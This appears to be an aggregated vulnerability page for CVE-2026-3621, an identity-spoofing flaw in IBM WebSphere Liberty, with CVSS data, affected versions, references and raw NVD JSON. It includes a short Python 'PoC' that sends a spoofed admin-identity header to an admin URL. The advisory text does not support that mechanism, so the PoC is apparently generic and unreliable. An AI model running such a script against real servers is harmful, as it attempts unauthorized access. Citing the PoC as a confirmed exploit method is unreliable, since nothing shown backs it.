CVE-2026-3621

Description

IBM WebSphere Application Server - Liberty 17.0.0.3 through 26.0.0.4 IBM WebSphere Application Server Liberty is vulnerable to identity spoofing under limited conditions when an application is deployed without authentication and authorization configured.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:liberty:*:*:* - VULNERABLE

IBM WebSphere Application Server - Liberty 17.0.0.3

IBM WebSphere Application Server - Liberty 17.0.0.4

IBM WebSphere Application Server - Liberty 26.0.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable WebSphere Liberty application
target_url = "http://vulnerable-host:9080/insecure-app/admin/resource"

# Malicious headers attempting to spoof identity
headers = {
    "User-Agent": "CVE-2026-3621-PoC",
    "X-Global-Trans-ID": "spoofed-admin-id"  # Example header used in identity spoofing
}

try:
    response = requests.get(target_url, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] PoC Successful: Identity spoofing may have occurred.")
        print("[+] Response:", response.text[:200])
    else:
        print(f"[-] PoC Failed: Server returned {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3621
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3621
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3621/
[4] VulDB https://vuldb.com/cve/CVE-2026-3621
[5] https://www.ibm.com/support/pages/node/7270437

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3621", "sourceIdentifier": "[email protected]", "published": "2026-04-23T00:16:45.313", "lastModified": "2026-05-13T20:24:13.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM WebSphere Application Server - Liberty 17.0.0.3 through 26.0.0.4 IBM WebSphere Application Server Liberty is vulnerable to identity spoofing under limited conditions when an application is deployed without authentication and authorization configured."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:websphere_application_server:*:*:*:*:liberty:*:*:*", "versionStartIncluding": "17.0.0.3", "versionEndExcluding": "26.0.0.5", "matchCriteriaId": "8DC1245B-8F64-4926-83E1-4D40D80ACFEB"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7270437", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}